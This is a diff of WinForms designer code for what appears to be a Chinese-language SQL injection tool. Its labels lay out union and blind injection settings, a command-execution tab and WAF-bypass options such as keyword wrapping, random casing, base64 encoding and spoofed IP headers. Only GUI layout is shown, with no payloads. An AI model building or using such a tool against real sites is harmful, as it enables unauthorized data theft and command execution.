+ // groupBox3
+ //
+ this.groupBox3.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox3.Controls.Add(this.groupBox16);
+ this.groupBox3.Controls.Add(this.groupBox15);
+ this.groupBox3.Controls.Add(this.chk_openURLEncoding);
+ this.groupBox3.Controls.Add(this.btn_inject_setEncodingRange);
+ this.groupBox3.Controls.Add(this.label13);
+ this.groupBox3.Controls.Add(this.label12);
+ this.groupBox3.Controls.Add(this.btn_inject_clearRequest);
+ this.groupBox3.Controls.Add(this.btn_inject_sendData);
+ this.groupBox3.Controls.Add(this.chk_inject_foward_302);
+ this.groupBox3.Controls.Add(this.btn_inject_setInject);
+ this.groupBox3.Location = new System.Drawing.Point(569, 13);
+ this.groupBox3.Name = "groupBox3";
+ this.groupBox3.Size = new System.Drawing.Size(225, 399);
+ this.groupBox3.TabIndex = 12;
+ this.groupBox3.TabStop = false;
+ this.groupBox3.Text = "注入设置";
+ //
+ // groupBox16
+ //
+ this.groupBox16.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox16.Controls.Add(this.label4);
+ this.groupBox16.Controls.Add(this.txt_inject_showColumn);
+ this.groupBox16.Controls.Add(this.label8);
+ this.groupBox16.Controls.Add(this.txt_inject_unionColumnsCount);
+ this.groupBox16.Location = new System.Drawing.Point(0, 127);
+ this.groupBox16.Name = "groupBox16";
+ this.groupBox16.Size = new System.Drawing.Size(225, 92);
+ this.groupBox16.TabIndex = 14;
+ this.groupBox16.TabStop = false;
+ this.groupBox16.Text = "Union注入取数据配置";
+ //
+ // label4
+ //
+ this.label4.AutoSize = true;
+ this.label4.Location = new System.Drawing.Point(15, 26);
+ this.label4.Name = "label4";
+ this.label4.Size = new System.Drawing.Size(65, 12);
+ this.label4.TabIndex = 1;
+ this.label4.Text = "数据列数:";
+ //
+ // txt_inject_showColumn
+ //
+ this.txt_inject_showColumn.Location = new System.Drawing.Point(86, 59);
+ this.txt_inject_showColumn.MaxLength = 3;
+ this.txt_inject_showColumn.Name = "txt_inject_showColumn";
+ this.txt_inject_showColumn.Size = new System.Drawing.Size(120, 21);
+ this.txt_inject_showColumn.TabIndex = 9;
+ this.txt_inject_showColumn.Text = "2";
+ this.txt_inject_showColumn.TextChanged += new System.EventHandler(this.txt_inject_showColumn_TextChanged);
+ //
+ // label8
+ //
+ this.label8.AutoSize = true;
+ this.label8.Location = new System.Drawing.Point(15, 62);
+ this.label8.Name = "label8";
+ this.label8.Size = new System.Drawing.Size(65, 12);
+ this.label8.TabIndex = 8;
+ this.label8.Text = "显 示 列:";
+ //
+ // txt_inject_unionColumnsCount
+ //
+ this.txt_inject_unionColumnsCount.Location = new System.Drawing.Point(86, 23);
+ this.txt_inject_unionColumnsCount.MaxLength = 3;
+ this.txt_inject_unionColumnsCount.Name = "txt_inject_unionColumnsCount";
+ this.txt_inject_unionColumnsCount.Size = new System.Drawing.Size(120, 21);
+ this.txt_inject_unionColumnsCount.TabIndex = 7;
+ this.txt_inject_unionColumnsCount.Text = "3";
+ this.txt_inject_unionColumnsCount.TextChanged += new System.EventHandler(this.txt_inject_unionColumnsCount_TextChanged);
+ //
+ // groupBox15
+ //
+ this.groupBox15.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.groupBox15.Controls.Add(this.cbox_inject_type);
+ this.groupBox15.Controls.Add(this.label27);
+ this.groupBox15.Controls.Add(this.inject_btn_autoFindKey);
+ this.groupBox15.Controls.Add(this.injectConfig_btn_checkKey);
+ this.groupBox15.Controls.Add(this.txt_inject_key);
+ this.groupBox15.Controls.Add(this.chk_inject_reverseKey);
+ this.groupBox15.Location = new System.Drawing.Point(0, 233);
+ this.groupBox15.Name = "groupBox15";
+ this.groupBox15.Size = new System.Drawing.Size(227, 166);
+ this.groupBox15.TabIndex = 14;
+ this.groupBox15.TabStop = false;
+ this.groupBox15.Text = "Bool盲注取数据配置";
+ //
+ // cbox_inject_type
+ //
+ this.cbox_inject_type.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cbox_inject_type.FormattingEnabled = true;
+ this.cbox_inject_type.Items.AddRange(new object[] {
+ "关键字判断-Bool",
+ "状态码判断-Bool",
+ "响应长度判断-Bool",
+ "时间判断-延时"});
+ this.cbox_inject_type.Location = new System.Drawing.Point(83, 25);
+ this.cbox_inject_type.Name = "cbox_inject_type";
+ this.cbox_inject_type.Size = new System.Drawing.Size(123, 20);
+ this.cbox_inject_type.TabIndex = 27;
+ this.cbox_inject_type.SelectedIndexChanged += new System.EventHandler(this.cbox_inject_type_SelectedIndexChanged);
+ //
+ // label27
+ //
+ this.label27.AutoSize = true;
+ this.label27.Location = new System.Drawing.Point(15, 28);
+ this.label27.Name = "label27";
+ this.label27.Size = new System.Drawing.Size(65, 12);
+ this.label27.TabIndex = 26;
+ this.label27.Text = "判断方式:";
+ //
+ // inject_btn_autoFindKey
+ //
+ this.inject_btn_autoFindKey.Location = new System.Drawing.Point(17, 92);
+ this.inject_btn_autoFindKey.Name = "inject_btn_autoFindKey";
+ this.inject_btn_autoFindKey.Size = new System.Drawing.Size(75, 23);
+ this.inject_btn_autoFindKey.TabIndex = 24;
+ this.inject_btn_autoFindKey.Text = "查找关键字";
+ this.inject_btn_autoFindKey.UseVisualStyleBackColor = true;
+ this.inject_btn_autoFindKey.Click += new System.EventHandler(this.inject_btn_autoFindKey_Click);
+ //
+ // injectConfig_btn_checkKey
+ //
+ this.injectConfig_btn_checkKey.Location = new System.Drawing.Point(133, 92);
+ this.injectConfig_btn_checkKey.Name = "injectConfig_btn_checkKey";
+ this.injectConfig_btn_checkKey.Size = new System.Drawing.Size(75, 23);
+ this.injectConfig_btn_checkKey.TabIndex = 23;
+ this.injectConfig_btn_checkKey.Text = "验证关键字是否设置正确";
+ this.injectConfig_btn_checkKey.UseVisualStyleBackColor = true;
+ this.injectConfig_btn_checkKey.Click += new System.EventHandler(this.injectConfig_btn_checkKey_Click);
+ //
+ // txt_inject_key
+ //
+ this.txt_inject_key.Location = new System.Drawing.Point(115, 59);
+ this.txt_inject_key.MaxLength = 20;
+ this.txt_inject_key.Name = "txt_inject_key";
+ this.txt_inject_key.Size = new System.Drawing.Size(93, 21);
+ this.txt_inject_key.TabIndex = 7;
+ this.txt_inject_key.Text = "个";
+ this.txt_inject_key.TextChanged += new System.EventHandler(this.txt_inject_key_TextChanged);
+ //
+ // chk_inject_reverseKey
+ //
+ this.chk_inject_reverseKey.AutoSize = true;
+ this.chk_inject_reverseKey.Location = new System.Drawing.Point(17, 61);
+ this.chk_inject_reverseKey.Name = "chk_inject_reverseKey";
+ this.chk_inject_reverseKey.Size = new System.Drawing.Size(84, 16);
+ this.chk_inject_reverseKey.TabIndex = 22;
+ this.chk_inject_reverseKey.Text = "反取判断值";
+ this.chk_inject_reverseKey.UseVisualStyleBackColor = true;
+ this.chk_inject_reverseKey.CheckedChanged += new System.EventHandler(this.chk_inject_reverseKey_CheckedChanged);
+ //
+ // chk_openURLEncoding
+ //
+ this.chk_openURLEncoding.AutoSize = true;
+ this.chk_openURLEncoding.Checked = true;
+ this.chk_openURLEncoding.CheckState = System.Windows.Forms.CheckState.Checked;
+ this.chk_openURLEncoding.Location = new System.Drawing.Point(17, 22);
+ this.chk_openURLEncoding.Name = "chk_openURLEncoding";
+ this.chk_openURLEncoding.Size = new System.Drawing.Size(90, 16);
+ this.chk_openURLEncoding.TabIndex = 21;
+ this.chk_openURLEncoding.Text = "开启URL编码";
+ this.chk_openURLEncoding.UseVisualStyleBackColor = true;
+ this.chk_openURLEncoding.CheckedChanged += new System.EventHandler(this.chk_openURLEncoding_CheckedChanged);
+ //
+ // btn_inject_setEncodingRange
+ //
+ this.btn_inject_setEncodingRange.Location = new System.Drawing.Point(131, 51);
+ this.btn_inject_setEncodingRange.Name = "btn_inject_setEncodingRange";
+ this.btn_inject_setEncodingRange.Size = new System.Drawing.Size(75, 23);
+ this.btn_inject_setEncodingRange.TabIndex = 19;
+ this.btn_inject_setEncodingRange.Text = "编码标记";
+ this.btn_inject_setEncodingRange.UseVisualStyleBackColor = true;
+ this.btn_inject_setEncodingRange.Click += new System.EventHandler(this.btn_inject_setEncodingRange_Click);
+ //
+ // label13
+ //
+ this.label13.AutoSize = true;
+ this.label13.Location = new System.Drawing.Point(10, 227);
+ this.label13.Name = "label13";
+ this.label13.Size = new System.Drawing.Size(0, 12);
+ this.label13.TabIndex = 18;
+ //
+ // label12
+ //
+ this.label12.AutoSize = true;
+ this.label12.Location = new System.Drawing.Point(9, 127);
+ this.label12.Name = "label12";
+ this.label12.Size = new System.Drawing.Size(0, 12);
+ this.label12.TabIndex = 17;
+ //
+ // btn_inject_clearRequest
+ //
+ this.btn_inject_clearRequest.Location = new System.Drawing.Point(131, 89);
+ this.btn_inject_clearRequest.Name = "btn_inject_clearRequest";
+ this.btn_inject_clearRequest.Size = new System.Drawing.Size(75, 23);
+ this.btn_inject_clearRequest.TabIndex = 10;
+ this.btn_inject_clearRequest.Text = "获取数据";
+ this.btn_inject_clearRequest.UseVisualStyleBackColor = true;
+ this.btn_inject_clearRequest.Click += new System.EventHandler(this.btn_inject_clearRequest_Click);
+ //
+ // btn_inject_sendData
+ //
+ this.btn_inject_sendData.Location = new System.Drawing.Point(17, 89);
+ this.btn_inject_sendData.Name = "btn_inject_sendData";
+ this.btn_inject_sendData.Size = new System.Drawing.Size(75, 23);
+ this.btn_inject_sendData.TabIndex = 14;
+ this.btn_inject_sendData.Text = "发送数据";
+ this.btn_inject_sendData.UseVisualStyleBackColor = true;
+ this.btn_inject_sendData.Click += new System.EventHandler(this.btn_inject_sendData_Click);
+ //
+ // chk_inject_foward_302
+ //
+ this.chk_inject_foward_302.AutoSize = true;
+ this.chk_inject_foward_302.Location = new System.Drawing.Point(133, 22);
+ this.chk_inject_foward_302.Name = "chk_inject_foward_302";
+ this.chk_inject_foward_302.Size = new System.Drawing.Size(66, 16);
+ this.chk_inject_foward_302.TabIndex = 16;
+ this.chk_inject_foward_302.Text = "302跟踪";
+ this.chk_inject_foward_302.UseVisualStyleBackColor = true;
+ this.chk_inject_foward_302.CheckedChanged += new System.EventHandler(this.chk_inject_foward_302_CheckedChanged);
+ //
+ // btn_inject_setInject
+ //
+ this.btn_inject_setInject.Location = new System.Drawing.Point(17, 51);
+ this.btn_inject_setInject.Name = "btn_inject_setInject";
+ this.btn_inject_setInject.Size = new System.Drawing.Size(75, 23);
+ this.btn_inject_setInject.TabIndex = 13;
+ this.btn_inject_setInject.Text = "注入标记";
+ this.btn_inject_setInject.UseVisualStyleBackColor = true;
+ this.btn_inject_setInject.Click += new System.EventHandler(this.btn_inject_setInject_Click);
+ //
+ // mytab
+ //
+ this.mytab.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.mytab.Controls.Add(this.tab_injectCenter);
+ this.mytab.Controls.Add(this.tab_dataCenter);
+ this.mytab.Controls.Add(this.tab_file);
+ this.mytab.Controls.Add(this.tab_cmd);
+ this.mytab.Controls.Add(this.tab_bypass);
+ this.mytab.Controls.Add(this.tab_encoding);
+ this.mytab.Controls.Add(this.tab_scanInjection);
+ this.mytab.Controls.Add(this.tab_logCenter);
+ this.mytab.ImageList = this.myicon_list;
+ this.mytab.Location = new System.Drawing.Point(12, 112);
+ this.mytab.Name = "mytab";
+ this.mytab.SelectedIndex = 0;
+ this.mytab.Size = new System.Drawing.Size(810, 451);
+ this.mytab.TabIndex = 1;
+ //
+ // tab_cmd
+ //
+ this.tab_cmd.Controls.Add(this.cmd_txt_result);
+ this.tab_cmd.Controls.Add(this.groupBox8);
+ this.tab_cmd.ImageKey = "cmd.png";
+ this.tab_cmd.Location = new System.Drawing.Point(4, 23);
+ this.tab_cmd.Name = "tab_cmd";
+ this.tab_cmd.Size = new System.Drawing.Size(802, 424);
+ this.tab_cmd.TabIndex = 6;
+ this.tab_cmd.Text = "命令执行";
+ this.tab_cmd.UseVisualStyleBackColor = true;
+ //
+ // cmd_txt_result
+ //
+ this.cmd_txt_result.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.cmd_txt_result.Location = new System.Drawing.Point(0, 76);
+ this.cmd_txt_result.MaxLength = 3276700;
+ this.cmd_txt_result.Multiline = true;
+ this.cmd_txt_result.Name = "cmd_txt_result";
+ this.cmd_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
+ this.cmd_txt_result.Size = new System.Drawing.Size(802, 348);
+ this.cmd_txt_result.TabIndex = 2;
+ this.cmd_txt_result.TextChanged += new System.EventHandler(this.cmd_txt_result_TextChanged);
+ this.cmd_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.cmd_txt_result_KeyDown);
+ //
+ // groupBox8
+ //
+ this.groupBox8.Controls.Add(this.cmd_chk_showCmdResult);
+ this.groupBox8.Controls.Add(this.cmd_btn_start);
+ this.groupBox8.Controls.Add(this.cmd_txt_cmd);
+ this.groupBox8.Controls.Add(this.label15);
+ this.groupBox8.Dock = System.Windows.Forms.DockStyle.Top;
+ this.groupBox8.Location = new System.Drawing.Point(0, 0);
+ this.groupBox8.Name = "groupBox8";
+ this.groupBox8.Size = new System.Drawing.Size(802, 76);
+ this.groupBox8.TabIndex = 1;
+ this.groupBox8.TabStop = false;
+ this.groupBox8.Text = "命令执行";
+ //
+ // cmd_chk_showCmdResult
+ //
+ this.cmd_chk_showCmdResult.AutoSize = true;
+ this.cmd_chk_showCmdResult.Checked = true;
+ this.cmd_chk_showCmdResult.CheckState = System.Windows.Forms.CheckState.Checked;
+ this.cmd_chk_showCmdResult.Location = new System.Drawing.Point(418, 32);
+ this.cmd_chk_showCmdResult.Name = "cmd_chk_showCmdResult";
+ this.cmd_chk_showCmdResult.Size = new System.Drawing.Size(72, 16);
+ this.cmd_chk_showCmdResult.TabIndex = 13;
+ this.cmd_chk_showCmdResult.Text = "回显结果";
+ this.cmd_chk_showCmdResult.UseVisualStyleBackColor = true;
+ this.cmd_chk_showCmdResult.CheckedChanged += new System.EventHandler(this.cmd_chk_showCmdResult_CheckedChanged);
+ //
+ // cmd_btn_start
+ //
+ this.cmd_btn_start.Location = new System.Drawing.Point(496, 28);
+ this.cmd_btn_start.Name = "cmd_btn_start";
+ this.cmd_btn_start.Size = new System.Drawing.Size(75, 23);
+ this.cmd_btn_start.TabIndex = 12;
+ this.cmd_btn_start.Text = "执行";
+ this.cmd_btn_start.UseVisualStyleBackColor = true;
+ this.cmd_btn_start.Click += new System.EventHandler(this.cmd_btn_start_Click);
+ //
+ // cmd_txt_cmd
+ //
+ this.cmd_txt_cmd.Location = new System.Drawing.Point(82, 29);
+ this.cmd_txt_cmd.MaxLength = 8000;
+ this.cmd_txt_cmd.Name = "cmd_txt_cmd";
+ this.cmd_txt_cmd.Size = new System.Drawing.Size(316, 21);
+ this.cmd_txt_cmd.TabIndex = 1;
+ //
+ // label15
+ //
+ this.label15.AutoSize = true;
+ this.label15.Location = new System.Drawing.Point(29, 32);
+ this.label15.Name = "label15";
+ this.label15.Size = new System.Drawing.Size(47, 12);
+ this.label15.TabIndex = 0;
+ this.label15.Text = "命 令:";
+ //
+ // tab_bypass
+ //
+ this.tab_bypass.Controls.Add(this.groupBox9);
+ this.tab_bypass.ImageKey = "codeChange.png";
+ this.tab_bypass.Location = new System.Drawing.Point(4, 23);
+ this.tab_bypass.Name = "tab_bypass";
+ this.tab_bypass.Size = new System.Drawing.Size(802, 424);
+ this.tab_bypass.TabIndex = 7;
+ this.tab_bypass.Text = "注入绕过";
+ this.tab_bypass.UseVisualStyleBackColor = true;
+ //
+ // groupBox9
+ //
+ this.groupBox9.Controls.Add(this.cbox_bypass_urlencode_count);
+ this.groupBox9.Controls.Add(this.cbox_base64Count);
+ this.groupBox9.Controls.Add(this.bypass_btn_saveTemplate);
+ this.groupBox9.Controls.Add(this.bypass_cbox_loadTemplate);
+ this.groupBox9.Controls.Add(this.label28);
+ this.groupBox9.Controls.Add(this.chk_reaplaceBeforURLEncode);
+ this.groupBox9.Controls.Add(this.cob_keyRepalce);
+ this.groupBox9.Controls.Add(this.label10);
+ this.groupBox9.Controls.Add(this.bypass_chk_base64);
+ this.groupBox9.Controls.Add(this.bypass_cbox_randIPToHeader);
+ this.groupBox9.Controls.Add(this.label18);
+ this.groupBox9.Controls.Add(this.label17);
+ this.groupBox9.Controls.Add(this.bypass_cbox_sendHTTPSleepTime);
+ this.groupBox9.Controls.Add(this.bypass_chk_inculdeStr);
+ this.groupBox9.Controls.Add(this.label16);
+ this.groupBox9.Controls.Add(this.bypass_txt_replaceTo);
+ this.groupBox9.Controls.Add(this.bypass_txt_replace);
+ this.groupBox9.Controls.Add(this.bypass_lvw_replaceString);
+ this.groupBox9.Controls.Add(this.bypass_btn_addReplaceStr);
+ this.groupBox9.Controls.Add(this.label19);
+ this.groupBox9.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.groupBox9.Location = new System.Drawing.Point(0, 0);
+ this.groupBox9.Name = "groupBox9";
+ this.groupBox9.Size = new System.Drawing.Size(802, 424);
+ this.groupBox9.TabIndex = 1;
+ this.groupBox9.TabStop = false;
+ this.groupBox9.Text = "字符替换进行注入绕过";
+ //
+ // cbox_base64Count
+ //
+ this.cbox_base64Count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cbox_base64Count.FormattingEnabled = true;
+ this.cbox_base64Count.Items.AddRange(new object[] {
+ "一次",
+ "二次",
+ "三次"});
+ this.cbox_base64Count.Location = new System.Drawing.Point(703, 24);
+ this.cbox_base64Count.Name = "cbox_base64Count";
+ this.cbox_base64Count.Size = new System.Drawing.Size(75, 20);
+ this.cbox_base64Count.TabIndex = 22;
+ this.cbox_base64Count.TextChanged += new System.EventHandler(this.cbox_base64Count_TextChanged);
+ //
+ // bypass_btn_saveTemplate
+ //
+ this.bypass_btn_saveTemplate.Location = new System.Drawing.Point(421, 190);
+ this.bypass_btn_saveTemplate.Name = "bypass_btn_saveTemplate";
+ this.bypass_btn_saveTemplate.Size = new System.Drawing.Size(150, 23);
+ this.bypass_btn_saveTemplate.TabIndex = 21;
+ this.bypass_btn_saveTemplate.Text = "保存当前绕过配置成模板";
+ this.bypass_btn_saveTemplate.UseVisualStyleBackColor = true;
+ this.bypass_btn_saveTemplate.Click += new System.EventHandler(this.bypass_btn_saveTemplate_Click);
+ //
+ // bypass_cbox_loadTemplate
+ //
+ this.bypass_cbox_loadTemplate.FormattingEnabled = true;
+ this.bypass_cbox_loadTemplate.Items.AddRange(new object[] {
+ "我要自己选择"});
+ this.bypass_cbox_loadTemplate.Location = new System.Drawing.Point(541, 151);
+ this.bypass_cbox_loadTemplate.Name = "bypass_cbox_loadTemplate";
+ this.bypass_cbox_loadTemplate.Size = new System.Drawing.Size(237, 20);
+ this.bypass_cbox_loadTemplate.TabIndex = 20;
+ this.bypass_cbox_loadTemplate.TextChanged += new System.EventHandler(this.bypass_cbox_loadTemplate_TextChanged);
+ //
+ // label28
+ //
+ this.label28.AutoSize = true;
+ this.label28.Location = new System.Drawing.Point(422, 154);
+ this.label28.Name = "label28";
+ this.label28.Size = new System.Drawing.Size(113, 12);
+ this.label28.TabIndex = 19;
+ this.label28.Text = "加载注入绕过模板:";
+ //
+ // chk_reaplaceBeforURLEncode
+ //
+ this.chk_reaplaceBeforURLEncode.AutoSize = true;
+ this.chk_reaplaceBeforURLEncode.Location = new System.Drawing.Point(20, 26);
+ this.chk_reaplaceBeforURLEncode.Name = "chk_reaplaceBeforURLEncode";
+ this.chk_reaplaceBeforURLEncode.Size = new System.Drawing.Size(294, 16);
+ this.chk_reaplaceBeforURLEncode.TabIndex = 18;
+ this.chk_reaplaceBeforURLEncode.Text = "URL编码前处理绕过字符(不选则在编码后处理字符)";
+ this.chk_reaplaceBeforURLEncode.UseVisualStyleBackColor = true;
+ this.chk_reaplaceBeforURLEncode.CheckedChanged += new System.EventHandler(this.chk_reaplaceBeforURLEncode_CheckedChanged);
+ //
+ // cob_keyRepalce
+ //
+ this.cob_keyRepalce.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cob_keyRepalce.FormattingEnabled = true;
+ this.cob_keyRepalce.Items.AddRange(new object[] {
+ "不处理",
+ "随机大小写",
+ "关键字大写",
+ "关键字小写"});
+ this.cob_keyRepalce.Location = new System.Drawing.Point(658, 64);
+ this.cob_keyRepalce.Name = "cob_keyRepalce";
+ this.cob_keyRepalce.Size = new System.Drawing.Size(120, 20);
+ this.cob_keyRepalce.TabIndex = 17;
+ this.cob_keyRepalce.SelectedIndexChanged += new System.EventHandler(this.cob_keyRepalce_SelectedIndexChanged);
+ //
+ // label10
+ //
+ this.label10.AutoSize = true;
+ this.label10.Location = new System.Drawing.Point(587, 67);
+ this.label10.Name = "label10";
+ this.label10.Size = new System.Drawing.Size(65, 12);
+ this.label10.TabIndex = 16;
+ this.label10.Text = "关 键 字:";
+ //
+ // bypass_chk_base64
+ //
+ this.bypass_chk_base64.AutoSize = true;
+ this.bypass_chk_base64.Location = new System.Drawing.Point(589, 27);
+ this.bypass_chk_base64.Name = "bypass_chk_base64";
+ this.bypass_chk_base64.Size = new System.Drawing.Size(108, 16);
+ this.bypass_chk_base64.TabIndex = 15;
+ this.bypass_chk_base64.Text = "base64编码处理";
+ this.bypass_chk_base64.UseVisualStyleBackColor = true;
+ this.bypass_chk_base64.CheckedChanged += new System.EventHandler(this.bypass_chk_base64_CheckedChanged);
+ //
+ // bypass_cbox_randIPToHeader
+ //
+ this.bypass_cbox_randIPToHeader.FormattingEnabled = true;
+ this.bypass_cbox_randIPToHeader.Items.AddRange(new object[] {
+ "",
+ "X-Forwarded-For",
+ "Remote-Addr",
+ "Client_Ip"});
+ this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(489, 108);
+ this.bypass_cbox_randIPToHeader.Name = "bypass_cbox_randIPToHeader";
+ this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(289, 20);
+ this.bypass_cbox_randIPToHeader.TabIndex = 14;
+ this.bypass_cbox_randIPToHeader.TextChanged += new System.EventHandler(this.bypass_cbox_randIPToHeader_TextChanged);
+ //
+ // label18
+ //
+ this.label18.AutoSize = true;
+ this.label18.Location = new System.Drawing.Point(422, 111);
+ this.label18.Name = "label18";
+ this.label18.Size = new System.Drawing.Size(65, 12);
+ this.label18.TabIndex = 13;
+ this.label18.Text = "IP随机头:";
+ //
+ // label17
+ //
+ this.label17.AutoSize = true;
+ this.label17.Location = new System.Drawing.Point(422, 66);
+ this.label17.Name = "label17";
+ this.label17.Size = new System.Drawing.Size(65, 12);
+ this.label17.TabIndex = 12;
+ this.label17.Text = "发包延时:";
+ //
+ // bypass_cbox_sendHTTPSleepTime
+ //
+ this.bypass_cbox_sendHTTPSleepTime.FormattingEnabled = true;
+ this.bypass_cbox_sendHTTPSleepTime.Items.AddRange(new object[] {
+ "0",
+ "100",
+ "200",
+ "300",
+ "400",
+ "500",
+ "600",
+ "700",
+ "800",
+ "900",
+ "1000",
+ "2000",
+ "3000",
+ "4000",
+ "5000",
+ "6000",
+ "7000",
+ "8000",
+ "9000",
+ "10000"});
+ this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(492, 63);
+ this.bypass_cbox_sendHTTPSleepTime.Name = "bypass_cbox_sendHTTPSleepTime";
+ this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(56, 20);
+ this.bypass_cbox_sendHTTPSleepTime.TabIndex = 11;
+ this.bypass_cbox_sendHTTPSleepTime.TextChanged += new System.EventHandler(this.bypass_cbox_sendHTTPSleepTime_TextChanged);
+ //
+ // bypass_chk_inculdeStr
+ //
+ this.bypass_chk_inculdeStr.AutoSize = true;
+ this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(421, 27);
+ this.bypass_chk_inculdeStr.Name = "bypass_chk_inculdeStr";
+ this.bypass_chk_inculdeStr.Size = new System.Drawing.Size(126, 16);
+ this.bypass_chk_inculdeStr.TabIndex = 3;
+ this.bypass_chk_inculdeStr.Text = "/*!xx*/包含关键字";
+ this.bypass_chk_inculdeStr.UseVisualStyleBackColor = true;
+ this.bypass_chk_inculdeStr.CheckedChanged += new System.EventHandler(this.bypass_chk_inculdeStr_CheckedChanged);
+ //
+ // label16
+ //
+ this.label16.AutoSize = true;
+ this.label16.Location = new System.Drawing.Point(188, 60);
+ this.label16.Name = "label16";
+ this.label16.Size = new System.Drawing.Size(41, 12);
+ this.label16.TabIndex = 10;
+ this.label16.Text = "替换成";
+ //
+ // bypass_txt_replaceTo
+ //
+ this.bypass_txt_replaceTo.Location = new System.Drawing.Point(235, 57);
+ this.bypass_txt_replaceTo.MaxLength = 100;
+ this.bypass_txt_replaceTo.Name = "bypass_txt_replaceTo";
+ this.bypass_txt_replaceTo.Size = new System.Drawing.Size(78, 21);
+ this.bypass_txt_replaceTo.TabIndex = 9;
+ //
+ // bypass_txt_replace
+ //
+ this.bypass_txt_replace.AcceptsReturn = true;
+ this.bypass_txt_replace.Location = new System.Drawing.Point(65, 57);
+ this.bypass_txt_replace.MaxLength = 100;
+ this.bypass_txt_replace.Name = "bypass_txt_replace";
+ this.bypass_txt_replace.Size = new System.Drawing.Size(78, 21);
+ this.bypass_txt_replace.TabIndex = 8;
+ //
+ // bypass_lvw_replaceString
+ //
+ this.bypass_lvw_replaceString.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
+ | System.Windows.Forms.AnchorStyles.Left)));
+ this.bypass_lvw_replaceString.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.col_replace,
+ this.col_replaceTo});
+ this.bypass_lvw_replaceString.ContextMenuStrip = this.bypass_lvw_replaceString_cms;
+ this.bypass_lvw_replaceString.FullRowSelect = true;
+ this.bypass_lvw_replaceString.Location = new System.Drawing.Point(20, 95);
+ this.bypass_lvw_replaceString.Name = "bypass_lvw_replaceString";
+ this.bypass_lvw_replaceString.Size = new System.Drawing.Size(387, 317);
+ this.bypass_lvw_replaceString.TabIndex = 7;
+ this.bypass_lvw_replaceString.UseCompatibleStateImageBehavior = false;
+ this.bypass_lvw_replaceString.View = System.Windows.Forms.View.Details;
+ //
+ // col_replace
+ //
+ this.col_replace.Text = "替换字符";
+ this.col_replace.Width = 187;
+ //
+ // col_replaceTo
+ //
+ this.col_replaceTo.Text = "目标字符";
+ this.col_replaceTo.Width = 179;
+ //
+ // bypass_lvw_replaceString_cms
+ //
+ this.bypass_lvw_replaceString_cms.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.bypass_delselect});
+ this.bypass_lvw_replaceString_cms.Name = "data_cms_getVariable";
+ this.bypass_lvw_replaceString_cms.Size = new System.Drawing.Size(125, 26);
+ //
+ // bypass_delselect
+ //
+ this.bypass_delselect.Name = "bypass_delselect";
+ this.bypass_delselect.Size = new System.Drawing.Size(124, 22);
+ this.bypass_delselect.Text = "删除选中";
+ this.bypass_delselect.Click += new System.EventHandler(this.bypass_delselect_Click);
+ //
+ // bypass_btn_addReplaceStr
+ //
+ this.bypass_btn_addReplaceStr.Location = new System.Drawing.Point(329, 56);
+ this.bypass_btn_addReplaceStr.Name = "bypass_btn_addReplaceStr";
+ this.bypass_btn_addReplaceStr.Size = new System.Drawing.Size(78, 23);
+ this.bypass_btn_addReplaceStr.TabIndex = 6;
+ this.bypass_btn_addReplaceStr.Text = "添加";
+ this.bypass_btn_addReplaceStr.UseVisualStyleBackColor = true;
+ this.bypass_btn_addReplaceStr.Click += new System.EventHandler(this.bypass_btn_addReplaceStr_Click);
+ //
+ // label19
+ //
+ this.label19.AutoSize = true;
+ this.label19.Location = new System.Drawing.Point(18, 60);
+ this.label19.Name = "label19";
+ this.label19.Size = new System.Drawing.Size(41, 12);
+ this.label19.TabIndex = 5;
+ this.label19.Text = "将字符";
+ //
+ // tab_encoding
+ //
+ this.tab_encoding.Controls.Add(this.groupBox13);
+ this.tab_encoding.Controls.Add(this.groupBox11);
+ this.tab_encoding.Controls.Add(this.groupBox10);
+ this.tab_encoding.ImageKey = "convert.png";
+ this.tab_encoding.Location = new System.Drawing.Point(4, 23);
+ this.tab_encoding.Name = "tab_encoding";
+ this.tab_encoding.Size = new System.Drawing.Size(802, 424);
+ this.tab_encoding.TabIndex = 5;
+ this.tab_encoding.Text = "编码转换";
+ this.tab_encoding.UseVisualStyleBackColor = true;
+ //
+ // groupBox13
+ //
+ this.groupBox13.Controls.Add(this.label21);
+ this.groupBox13.Controls.Add(this.label23);
+ this.groupBox13.Controls.Add(this.encode_cbox_encode);
+ this.groupBox13.Controls.Add(this.encode_cbox_decode);
+ this.groupBox13.Dock = System.Windows.Forms.DockStyle.Bottom;
+ this.groupBox13.Location = new System.Drawing.Point(0, 361);
+ this.groupBox13.Name = "groupBox13";
+ this.groupBox13.Size = new System.Drawing.Size(802, 63);
+ this.groupBox13.TabIndex = 8;
+ this.groupBox13.TabStop = false;
+ this.groupBox13.Text = "操作:";
+ //
+ // label21
+ //
